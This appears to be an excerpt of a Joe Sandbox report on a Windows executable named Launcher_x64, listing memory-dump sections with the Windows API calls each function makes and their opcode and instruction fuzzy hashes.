                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: e11eecbea5574055480e474f930a62a5d8ea565e96ba689ed594bd4078c99adf
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: EC022EB1E012199BDF14CFA9C8806AEFBF1FF48314F148269E519E7341E731AA45DBA0
                                                                                          APIs
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00D7B889
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00D7B97D
                                                                                          • FindClose.KERNEL32(00000000), ref: 00D7B9BC
                                                                                          • FindClose.KERNEL32(00000000), ref: 00D7B9EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 1164774033-0
                                                                                          • Opcode ID: 801167110db00bd50cfae73183633bc41ec84cc9cd2ce975b474f9eb2b9de21b
                                                                                          • Instruction ID: a27731a8df10288f65147688b0229921d56446654edd4173388bea0d814b5c21
                                                                                          • Opcode Fuzzy Hash: 801167110db00bd50cfae73183633bc41ec84cc9cd2ce975b474f9eb2b9de21b
                                                                                          • Instruction Fuzzy Hash: F271A3719051586FDF20AF289C89BAEB7B8EF45310F5881DAE54DA7211FB314E849F70
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D69A7F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00D69B4B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D69B64
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00D69B6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: cbe7d31c04a57894dee06fb981df5a72526c8d01320c22f0f82a803aafe69e3d
                                                                                          • Instruction ID: 7fdec92870f0d2781a78abc8879858e6f38e773c036cc1ab135d9c4411f21d82
                                                                                          • Opcode Fuzzy Hash: cbe7d31c04a57894dee06fb981df5a72526c8d01320c22f0f82a803aafe69e3d
                                                                                          • Instruction Fuzzy Hash: 9A31D775D053199BDB21EFA4D949BCDBBF8AF48300F1041EAE40DAB250EB719A848F55
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D6A347
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D6A356
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00D6A35F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00D6A36C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: faf9d3ccbc6641f872816f5800288b781c42454cafc434d674908ef3bbe879db
                                                                                          • Instruction ID: bbf00d3dda957a98ff7d7e86c21c8e63d493014f009d73c495d5503a4446a4c7
                                                                                          • Opcode Fuzzy Hash: faf9d3ccbc6641f872816f5800288b781c42454cafc434d674908ef3bbe879db
                                                                                          • Instruction Fuzzy Hash: 94F06774D1020DEBCB00EBB4D94999EBBF4FF1D204B514995E412E7210E730A7449F51
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7AD84
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7ADCE
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7AE94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 661929714-0
                                                                                          • Opcode ID: adc16f89f437e3c39ca508a0e82ff152d85a61503694291c66e99e4a799ff056
                                                                                          • Instruction ID: 08e71dd7e79cca9c5b3b9357c29de66e9acba1801691bdf8ef307e59747a54d5
                                                                                          • Opcode Fuzzy Hash: adc16f89f437e3c39ca508a0e82ff152d85a61503694291c66e99e4a799ff056
                                                                                          • Instruction Fuzzy Hash: 4F617E716106079FDB289F28CC82BAEB7A8EF44310F14817AF909C6285F774D990DB71
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D71B58
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D71B62
                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D71B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 470bf3e373d7fdbf697b482ddf9247e58d0952e0461d3bcf142965c68eb4b474
                                                                                          • Instruction ID: e0e89d82dceab26d965f7f94a24c4fce11272a27dd49edabbfaa37f8a686bd86
                                                                                          • Opcode Fuzzy Hash: 470bf3e373d7fdbf697b482ddf9247e58d0952e0461d3bcf142965c68eb4b474
                                                                                          • Instruction Fuzzy Hash: 1D31B5749113289BCB21DF68D8897DDBBB8FF08710F5042DAE40CA7251E7709B858F54
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D7E9E9,?,?,00000008,?,?,00D8539B,00000000), ref: 00D7ECBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: 6310c792feba82490206b5a1168a4f27bcd3dbffd8fec10942303b70e9c728f0
                                                                                          • Instruction ID: 179e9518d970de63db2885d9aaed5de49c90cfa887108ae92e31e3eebcc1ae04
                                                                                          • Opcode Fuzzy Hash: 6310c792feba82490206b5a1168a4f27bcd3dbffd8fec10942303b70e9c728f0
                                                                                          • Instruction Fuzzy Hash: BBB12A35610608DFD725CF28C48AB657BE0FF49364F29C698E89ACF2A1D335E991CB50
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D696F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-0
                                                                                          • Opcode ID: 95b7ff81c0339fe5d67abae264fdd229fa43d4ebf0c0f0f790662d0b23cafdd8
                                                                                          • Instruction ID: 7f4bc724d3881cc5b4d48787a2e8eb421ed6784ead4e706c5a47c0e0beb2ba1f
                                                                                          • Opcode Fuzzy Hash: 95b7ff81c0339fe5d67abae264fdd229fa43d4ebf0c0f0f790662d0b23cafdd8
                                                                                          • Instruction Fuzzy Hash: EFA13AB2A117098FDB58DF54E8926A9BBF4FF48324F28952AD415EB360D3749940CFB0
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7B044
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: 450070413b99ce01f75e21b6bb5da8ef4def9df32e9c6666736d6632d023f7ac
                                                                                          • Instruction ID: 11e9911cfa9eb5645f5a8edcdbcdefa62f03233d278d94bb0cec2a33a1f836e9
                                                                                          • Opcode Fuzzy Hash: 450070413b99ce01f75e21b6bb5da8ef4def9df32e9c6666736d6632d023f7ac
                                                                                          • Instruction Fuzzy Hash: C0218332611206ABDB289A25DC41BBB77A8EF45324B14806BF919C6141FB74DD508B70
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: 83d65d4a95c123ca091508949ce761d73b89f6eee56525b972ac7f8f265e9158
                                                                                          • Instruction ID: 9b715ea91fc8cc8d395101b50819e2dc36bc3d5bb39152ce038fd051b697e9bb
                                                                                          • Opcode Fuzzy Hash: 83d65d4a95c123ca091508949ce761d73b89f6eee56525b972ac7f8f265e9158
                                                                                          • Instruction Fuzzy Hash: 72B1A274E0064A8BCB34CF68E5556BEB7B2AF15300F180619E5D39B692D732E906CBB1
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7B164
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: abfb8fdf3f28d1c322c011b4bc369761fbdfb041789d422ea428ac96c1871df2
                                                                                          • Instruction ID: e3185c71b5fba142d953f25adf99ffbe3c04e22c01bbd61d723a1e02a7033af5
                                                                                          • Opcode Fuzzy Hash: abfb8fdf3f28d1c322c011b4bc369761fbdfb041789d422ea428ac96c1871df2
                                                                                          • Instruction Fuzzy Hash: 2311C272611206ABDB14AF28DC56ABA77E8EF05320B14817BE909D7241FB78ED058B70
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • EnumSystemLocalesW.KERNEL32(00D7AD30,00000001,00000000,?,-00000050,?,00D7AB13,00000000,-00000002,00000000,?,00000055,?), ref: 00D7ACFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 3f87a1caba451855c746082828df5698a453b2e8469aa4f3b7bc77a04590137c
                                                                                          • Instruction ID: 587ffc6c6f3806a8425bd02e6264d22e4d14265e14ecdefc71ca27b785887524
                                                                                          • Opcode Fuzzy Hash: 3f87a1caba451855c746082828df5698a453b2e8469aa4f3b7bc77a04590137c
                                                                                          • Instruction Fuzzy Hash: F411C63A2007019FDB289F39C8916BEB791FBC4369B19842DE94A87B40E7716942CB60
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D7AF4C,00000000,00000000,?), ref: 00D7B2E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: 4a23a3bcb4ff7f9ecbf97a23dbb117f0e85deca5131cee18980c36c9869672b5
                                                                                          • Instruction ID: 0d4317c39174030e23ea0a5718e9b407d16ef38480df10089347d5517b396201
                                                                                          • Opcode Fuzzy Hash: 4a23a3bcb4ff7f9ecbf97a23dbb117f0e85deca5131cee18980c36c9869672b5
                                                                                          • Instruction Fuzzy Hash: BC01DB36610112EBDB185A2598067FA7764EB40374F55842AEC4AE3180FB70EE81C6B0
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • EnumSystemLocalesW.KERNEL32(00D7AFF0,00000001,?,?,-00000050,?,00D7AADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00D7AFCD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 411ed72425494cb0aa74600ff01e2bf93d3746214d7741843db3ad0dc92ac54e
                                                                                          • Instruction ID: b8ab432dea2cf69446ba6b51f5df974aa9a36250d7f582fdecd40f8ed8842e1a
                                                                                          • Opcode Fuzzy Hash: 411ed72425494cb0aa74600ff01e2bf93d3746214d7741843db3ad0dc92ac54e
                                                                                          • Instruction Fuzzy Hash: 32F0F6762003045FDB255F39D891A7EBB91EFC0368B19C42DF94A8B680E7B19C42CB71
                                                                                          APIs
                                                                                            • Part of subcall function 00D71D11: EnterCriticalSection.KERNEL32(?,?,00D75DD8,?,00D8FC38,00000008,00D75CCA,00000000,00000000,?), ref: 00D71D20
                                                                                          • EnumSystemLocalesW.KERNEL32(00D768F0,00000001,00D8FCB8,0000000C,00D762F1,-00000050), ref: 00D76935
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
                                                                                          • Opcode ID: d3e0f3ee8d15d530ee5b983a9d5868daa4cceec8a46471970d01839fc74c946d
                                                                                          • Instruction ID: 2bdd0e395564f32ca1fadbe64dcb414deeaae9bddb559bff3418ec6fc69061e5
                                                                                          • Opcode Fuzzy Hash: d3e0f3ee8d15d530ee5b983a9d5868daa4cceec8a46471970d01839fc74c946d
                                                                                          • Instruction Fuzzy Hash: 49F0373AA00304DFD700EFA8E842B9C77F0EB48721F10812AF524DB3A0DB7599048FA0
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • EnumSystemLocalesW.KERNEL32(00D7B110,00000001,?,?,?,00D7AB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00D7B0FC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 6b44eee134c5614f862461b40f8f7c5609b882c177df29fcf1016169af8de50c
                                                                                          • Instruction ID: 557a3f7a92e367829a8c28301abbc0d9c94c3c2c0a1b7aa2da24d8b92643e057
